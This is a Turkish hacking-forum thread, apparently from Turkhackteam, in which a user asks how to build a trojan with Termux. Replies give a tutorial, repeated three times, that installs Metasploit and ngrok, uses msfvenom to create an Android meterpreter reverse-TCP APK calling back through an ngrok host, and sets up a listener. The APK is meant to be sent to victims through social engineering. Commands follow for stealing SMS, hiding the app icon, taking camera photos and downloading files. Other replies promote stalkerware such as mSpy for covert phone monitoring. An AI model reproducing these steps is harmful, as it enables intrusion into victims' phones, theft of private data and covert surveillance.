İlk önce cevabınız için tesekkur ederim termux trojan toolu nedir?Merhaba,
Telefonunuz üzerinden Termux yazılımını kullanarak bir trojan oluşturabilirsiniz. Trojani de karşı tarafa sosyal mühendislik tarafından kandırıp yükletirseniz, trojanı dinlemeye başlayabilirsiniz.
Aciklarmisiniz ?server satin alip rdp client uygulamasi ile baglanip normal bilgisayar gibi kullanabilirsin
Oncelikle tesekkurler peki karsi tarafin trojanimi indirip inidrmedigimi nerden anlayacagimMerhaba değerli üye,
Termux üzerinden yapmanız mümkün.
Sırayla neleri anlatacağım
1)Metasploit,Trojen,Ngrok tanımları anlatılacak
2)Metasploit ve Ngrokun nasıl kurulacağı anlatıyorum
3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur
1)
Metasploit,Trojen,Ngrok kavramları nedir?
A)Trojen nedir
B)Metploit nedir
C)Ngrok nedir
A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:
Veri silme
Veri engelleme
Veri değiştirme
Veri kopyalama
Bilgisayarların veya bilgisayar ağlarının performansını düşürme
Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz
B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.
C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılşım sayesinde modemde port açmamıza gerek yoktur)
2)
Metasploit ve Ngrokun nasıl kurulur?
A)Metasploit nasıl kurulur?
B)Ngrok nasıl kurulur?
A)Metasploiti kuralım;
Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin
Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz
bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin
kodlara gelelim
bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce
termux-change-repo
komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda
(gelen soruları görmek için ekranı büyültün,ve tüm gelen sorularda küçük y basın)
1-pkg install git -y
2-git clone GitHub - jokzilla/metakurucu
3-cd metakurucu
4-chmod +x *
5-bash metakurucu.sh
toolumuz indi 1i seçiyoruz ve kurulum başladı
termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoru ve ordanda exit diyoruz
burdaki işlemimiz bu kadar şimdi ngroku kuralım
B)Ngroku kuralım;
termuxu tekrar açıyoruz
1-pkg install git -y
2-git clone GitHub - termuxxtoolss/NGROK-KURULUM
3-cd NGROK-KURULUM
4-chmod 777 ngrok-kurulum.sh
5-bash ngrok-kurulum.sh
ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;
ngrok - secure introspectable tunnels to localhost
kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)
3)
Trojen nasıl oluturulur;
ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki
online yazan yer kırmızı olursa demeki sorun vardır
ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir
termux-setup-storage
depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için
soldan kaydırarak new sesion diyoruz
resimde belirttiğim gibi altaki paylodda LHOST vs RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde)
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve
trojaniniz sdcard(dahili hafızaya kaydoldu)
TROJENİ DİNLEMEYE ALALIM
msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının sçılmasını bekliyoruz ardından
Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;
use exploit/multi/handler
burda trojeni oluşturuken yazdığımız payloadıı yazıyoruz yani;
set payload android/meterpreter/reverse_tcp
Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;
set LHOST 127.0.0.1
Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"
yazdığımız yere burdaki sayıyı alıyoruz "1275"
set LPORT 1275
ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apkyı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)
help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar
İŞİNİZE YARIYACAK BAZI KOMUTLAR
Kurbanın telefonundan telefonunuza SMS alın:
Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.
dump_sms
Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:
Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.
hide_app_icon
Kurbanın telefonunun ses modunu değiştirin:
aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.
set_audio_mode -m 1
telefonu sessize almak için;
set_audio_mode -m 0
Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.
webcam_snap
Kurbanların dosya depolamasına erişin:
Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz
cd /sdcard
Kurbanın telefonundan herhangi bir dosyayı indirin:
karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın
download file-name
bilgilerin sana gelemsi gerekOncelikle tesekkurler peki karsi tarafin trojanimi indirip inidrmedigimi nerden anlayacagim
Anlayamadim maalesefbilgilerin sana gelemsi gerek
Oncelikle tesekkurler peki karsi tarafin trojanimi indirip inidrmedigimi nerden anlayacagim
İndirip kurduğunda zaten sana bildiriyor metasploit dinleme kısmıOncelikle tesekkurler peki karsi tarafin trojanimi indirip inidrmedigimi nerden anlayacagim
mspy kurmak icin telefona direk fiziksel olarak erismen gerek cunku uygulamayi yukledikten sonra ayar yapiyorsun direk calismiyorMerhaba değerli üye,
Trojan yerine kleylogger atmayı deneyebilirsiniz.
Merhaba değerli üye;
kendi telefonuna keylogger kurabilirsin.Aşağıdaki keylogger çeşitlerine bakabilirsiniz.
MSpy
Tanıştırayım: mSpy. Casus programı olarak da geçen bu özel yazılım klavye ve ekran kaydı için kullanabileceğin yazılımlardan yalnızca biri. Bu yazılım aracılığıyla, hedef telefondaki tüm klavye ve ekran hareketlerini görüntüleyebilir ve ekran kaydını alabilirsin. Bu da demek oluyor ki tüm şifreler, yazışmalar ve çok daha fazlası parmaklarının ucunda olacak.
Gibi birçok yazışmayı da inceleme şansı veriyor:
Whatsapp konuşmaları,
gelen ve giden SMS’ler,
Messenger sohbetleri.
Böylece kimlerle ve hangi zaman diliminde bu yazışmaların gerçekleştiğini de gözlemleyebilirsin.
mSpy; aynı zamanda günümüzün vazgeçilmezi olan sosyal medya kanallarına tam erişim sağlar. Böylece hedef telefona yüklenmiş; Facebook, Twitter, Instagram ve daha birçok sosyal ağ uygulamasını dilediğin şekilde incelemeni ve kaydetmeni sağlar.
mSpy keylogger
Kolay ve etkin GPS takibi için yine mSpy’a güvenebilirsin. Yedi gün yirmi dört saat boyunca hedef cihazın konumunu canlı olarak takip edebildiğin gibi, coğrafya çerçeveleme özelliği sayesinde kişi senin belirleyeceğin sınırları aştığında ilgili cihazdan bildirim alabilirsin. Bunun yalnızca mSpy’a has bir özellik olduğunu da ekleyip diğer Android keylogger programlarına göz atalım…
SpyBubble
Klavye dinlemeyle yetinmeyenlere çok daha geniş çözümler sunan SpyBubble, bir casus yazılım olarak da biliniyor. Masaüstü bilgisayarlarda, online bir panel üzerinden hedeflenen cihazı takip etmeye yarayan bu yazılım aynı zamanda hedeflenen cihazla ilgili verileri edinmeye de yarıyor.
GPS üzerinden canlı konum takibi, gelen ve giden aramaların takibi, SMS takibi, Whatsapp mesajlarını okuma, cihazda yer alan fotoğraf ve videolara erişim gibi birçok özelliği tek bir çatı altında sunuyor.
Keylogger bulmak için gezinmene gerek yok, SpyBubble klavye kontrol özelliği ile diğer keylogger programlarının sahip olduklarını ve çok daha fazlasını kullanıcılarına vaat ediyor. Piyasada da başarısını kanıtlamış nadir programlardan biri olan SpyBubble, keylogger atma işlemi için de rahatlıkla güvenebileceğin bir hizmet sunuyor.
MobileSpy
Gelelim üçüncü ve son önerimize. Telefone keylogger atma işlemlerini gerçekleştirmek için yararlanabileceğin bu özel yazılım, diğerlerinden farklı olarak online kontrol panelini dilediğin cihazdan görüntülemeni sağlıyor. Yani yalnızca masaüstünden değil; tablet, akıllı telefon ve diğer tüm akıllı cihazlardan görüntüleme gerçekleştirebilirsin.
Keylogger Kullanarak Hangi Bilgileri Görülebilir?
Her keylogger atma programı farklı çalışsa da birçok ortak özelliğe sahip oldukları da bir gerçektir. Keylogger programlarının temel amacı “klavyeyi dinlemek”tir. Diğer bir deyişle klavyede gerçekleşen tüm etkinlikleri kayıt altına almak ve bu sayede hedef cihazdaki bilgileri kopyalamak veya saklamaktır.
Çoğunlukla şifrelerin hacklenmesi, eposta ve mesaj kutularına erişim gibi amaçlarla kullanılsa da bu programların yetenekleri oldukça gelişmiştir. Şimdi bu yeteneklerin bazılarından bahsedelim, yani keylogger kullanarak hangi bilgileri görüntüleyebileceğini inceleyelim:
SMS Mesajları. Yukarıda kısaca bahsetmiştik ancak tekrar ele almamızda sakınca bulunmuyor. Keylogger programları yalnızca klavye dinlemeden ibaret değil. Onu önemli hale getiren özelliklerden biri de gelen, giden veya kaydedilen mesajları incelemeye olanak vermesi. Keylogger programları böylece hedef cihaz üzerinde bulunan tüm SMS mesajlarının içeriğini, tarihlerini ve uzunluklarını kontrol etme şansı sunuyor.
E-postalar. Hedef cihaza gelen ve cihazdan başka bir cihaza gönderilen tüm e-postaları inceleme olanağı sunan keylogger programları, e-posta eklerinde yer alan dosyalar ve yazışmalarım tamamını kontrol etmene yardımcı olur. Tıpkı SMS mesajları gibi burada da gelen ve giden tüm e-posta içeriklerini tek tek inceleyebilirsin.
Sosyal Ağlardaki Veriler. Tüm derdimiz mesajlar değil elbette. Elimizden hiç düşürmediğimiz telefonlarımızın baş tacı sosyal ağlardaki veriler de son derece ilgi çekici. Keylogger programları aracılığıyla telefonda yer alan tüm sosyal ağlara erişebilir ve bu ağlardaki tüm aktiviteleri kayıt altına alabilirsin. Yani her bir paylaşım avcunun içinde olacak.
Konum Bilgileri. Android keylogger programları, hedef telefon üzerinden GPS yardımıyla cihazın konumunu 7 gün 24 saat boyunca takip etmeni mümkün hale getirir. Böylece dilediğin zaman cihazın konum bilgilerine de erişebilirsin. Eğer kullanıcı konum bilgilerini gizli tutmadıysa önceki konum bilgilerine erişmen de mümkün.
Android İçi Keylogger Nasıl Yüklenir Ve Kullanılır?
Android keylogger uygulaması indirmek ve kurmak sandığından da basit. Bu basit adımları tek tek ve sırayla uygulayalım.
Android keylogger programları, tıpkı iPhone cihazlarda olduğu gibi hızlı ve kolayca kurulabilir. İlk olarak hedeflediğin telefona erişimin olmalı. Telefonu eline aldıktan sonra, ilk iş olarak telefondaki Google Play korumasını kaldıracak adımları tamamlamalısın. Bu dilediğin uygulamayı daha rahat şekilde yüklemene yardımcı olacak. Bu işlemi yapmak için
Ayarlar
Güvenlik
Google Play Koruması
dizinini takip etmen gerekiyor.
Sıra indirme dosyasını telefona indirmekte. Bunun için telefonun internet tarayıcısını açarak b33w.net/a adresine gitmeli ve “.apk” uzantılı dosyayı indirmelisin. Bu dosya aracılığı ile yükleme işlemin de başlamış olacak. Yükleme işlemi tamamlandıktan sonra mSpy’ı satın aldıktan sonra sana verilen kayıt kodu ile işlemi sonlandırabilirsin. Artık dilediğin yer ve dilediğin zamanda hedef cihazını izlemeye hazırsın!
Saol çok yardımcı olabilicek bir uyguluma gibi gozukuyor kullanınca deneyimlerimi aktarıcağimmspy kurmak icin telefona direk fiziksel olarak erismen gerek cunku uygulamayi yukledikten sonra ayar yapiyorsun direk calismiyor
ios ta nasıl yapabilirimMerhaba değerli üye,
Termux üzerinden yapmanız mümkün.
Sırayla neleri anlatacağım
1)Metasploit,Trojen,Ngrok tanımları anlatılacak
2)Metasploit ve Ngrokun nasıl kurulacağı anlatıyorum
3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur
1)
Metasploit,Trojen,Ngrok kavramları nedir?
A)Trojen nedir
B)Metploit nedir
C)Ngrok nedir
A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:
Veri silme
Veri engelleme
Veri değiştirme
Veri kopyalama
Bilgisayarların veya bilgisayar ağlarının performansını düşürme
Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz
B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.
C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılşım sayesinde modemde port açmamıza gerek yoktur)
2)
Metasploit ve Ngrokun nasıl kurulur?
A)Metasploit nasıl kurulur?
B)Ngrok nasıl kurulur?
A)Metasploiti kuralım;
Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin
Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz
bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin
kodlara gelelim
bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce
termux-change-repo
komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda
(gelen soruları görmek için ekranı büyültün,ve tüm gelen sorularda küçük y basın)
1-pkg install git -y
2-git clone GitHub - jokzilla/metakurucu
3-cd metakurucu
4-chmod +x *
5-bash metakurucu.sh
toolumuz indi 1i seçiyoruz ve kurulum başladı
termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoru ve ordanda exit diyoruz
burdaki işlemimiz bu kadar şimdi ngroku kuralım
B)Ngroku kuralım;
termuxu tekrar açıyoruz
1-pkg install git -y
2-git clone GitHub - termuxxtoolss/NGROK-KURULUM
3-cd NGROK-KURULUM
4-chmod 777 ngrok-kurulum.sh
5-bash ngrok-kurulum.sh
ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;
ngrok - secure introspectable tunnels to localhost
kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)
3)
Trojen nasıl oluturulur;
ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki
online yazan yer kırmızı olursa demeki sorun vardır
ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir
termux-setup-storage
depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için
soldan kaydırarak new sesion diyoruz
resimde belirttiğim gibi altaki paylodda LHOST vs RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde)
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve
trojaniniz sdcard(dahili hafızaya kaydoldu)
TROJENİ DİNLEMEYE ALALIM
msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının sçılmasını bekliyoruz ardından
Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;
use exploit/multi/handler
burda trojeni oluşturuken yazdığımız payloadıı yazıyoruz yani;
set payload android/meterpreter/reverse_tcp
Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;
set LHOST 127.0.0.1
Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"
yazdığımız yere burdaki sayıyı alıyoruz "1275"
set LPORT 1275
ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apkyı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)
help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar
İŞİNİZE YARIYACAK BAZI KOMUTLAR
Kurbanın telefonundan telefonunuza SMS alın:
Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.
dump_sms
Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:
Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.
hide_app_icon
Kurbanın telefonunun ses modunu değiştirin:
aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.
set_audio_mode -m 1
telefonu sessize almak için;
set_audio_mode -m 0
Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.
webcam_snap
Kurbanların dosya depolamasına erişin:
Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz
cd /sdcard
Kurbanın telefonundan herhangi bir dosyayı indirin:
karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın
download file-name
Apple, dış kaynaktan uygulama indirmeye sıcak bakmıyor. Öyle ki dışarıdan bir uygulama indirsen bile bunun için uygulamanın bir şirkete ait olması ve sertifikaya sahip olması gerekiyor. App Storea uygulama eklediğin zaman uygulaman güvenlik taramalarından geçiyor. Onu da geçtin diyelim arkaplanda işlem yaptırman için kullanıcıdan ayrıca bir izin daha alacaksın. Çok zor verdiğin emeğe bile değeceğini zannetmiyorum mspy var fakat o da paralı diye biliyorum bakmak lazımios ta nasıl yapabilirim
msfconsole yazdıktan sonra could not find pg-1.2.3 in any of the sources run 'bundle install' to install missing gems hatasını alıyorum neden ?Merhaba değerli üye,
Termux üzerinden yapmanız mümkün.
Sırayla neleri anlatacağım
1)Metasploit,Trojen,Ngrok tanımları anlatılacak
2)Metasploit ve Ngrokun nasıl kurulacağı anlatıyorum
3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur
1)
Metasploit,Trojen,Ngrok kavramları nedir?
A)Trojen nedir
B)Metploit nedir
C)Ngrok nedir
A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:
Veri silme
Veri engelleme
Veri değiştirme
Veri kopyalama
Bilgisayarların veya bilgisayar ağlarının performansını düşürme
Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz
B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.
C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılşım sayesinde modemde port açmamıza gerek yoktur)
2)
Metasploit ve Ngrokun nasıl kurulur?
A)Metasploit nasıl kurulur?
B)Ngrok nasıl kurulur?
A)Metasploiti kuralım;
Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin
Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz
bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin
kodlara gelelim
bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce
termux-change-repo
komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda
(gelen soruları görmek için ekranı büyültün,ve tüm gelen sorularda küçük y basın)
1-pkg install git -y
2-git clone GitHub - jokzilla/metakurucu
3-cd metakurucu
4-chmod +x *
5-bash metakurucu.sh
toolumuz indi 1i seçiyoruz ve kurulum başladı
termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoru ve ordanda exit diyoruz
burdaki işlemimiz bu kadar şimdi ngroku kuralım
B)Ngroku kuralım;
termuxu tekrar açıyoruz
1-pkg install git -y
2-git clone GitHub - termuxxtoolss/NGROK-KURULUM
3-cd NGROK-KURULUM
4-chmod 777 ngrok-kurulum.sh
5-bash ngrok-kurulum.sh
ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;
ngrok - secure introspectable tunnels to localhost
kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)
3)
Trojen nasıl oluturulur;
ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki
online yazan yer kırmızı olursa demeki sorun vardır
ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir
termux-setup-storage
depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için
soldan kaydırarak new sesion diyoruz
resimde belirttiğim gibi altaki paylodda LHOST vs RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde)
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve
trojaniniz sdcard(dahili hafızaya kaydoldu)
TROJENİ DİNLEMEYE ALALIM
msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının sçılmasını bekliyoruz ardından
Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;
use exploit/multi/handler
burda trojeni oluşturuken yazdığımız payloadıı yazıyoruz yani;
set payload android/meterpreter/reverse_tcp
Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;
set LHOST 127.0.0.1
Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"
yazdığımız yere burdaki sayıyı alıyoruz "1275"
set LPORT 1275
ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apkyı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)
help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar
İŞİNİZE YARIYACAK BAZI KOMUTLAR
Kurbanın telefonundan telefonunuza SMS alın:
Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.
dump_sms
Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:
Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.
hide_app_icon
Kurbanın telefonunun ses modunu değiştirin:
aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.
set_audio_mode -m 1
telefonu sessize almak için;
set_audio_mode -m 0
Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.
webcam_snap
Kurbanların dosya depolamasına erişin:
Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz
cd /sdcard
Kurbanın telefonundan herhangi bir dosyayı indirin:
karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın
download file-name
Dostum bundle install de hata verirse tekrar gem install -v pg 1.2.3 dene yine olmazsa gem unnistal -v pg (version) bunu yap sonra gemi tekrar yüklemsfconsole yazdıktan sonra could not find pg-1.2.3 in any of the sources run 'bundle install' to install missing gems hatasını alıyorum neden?
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.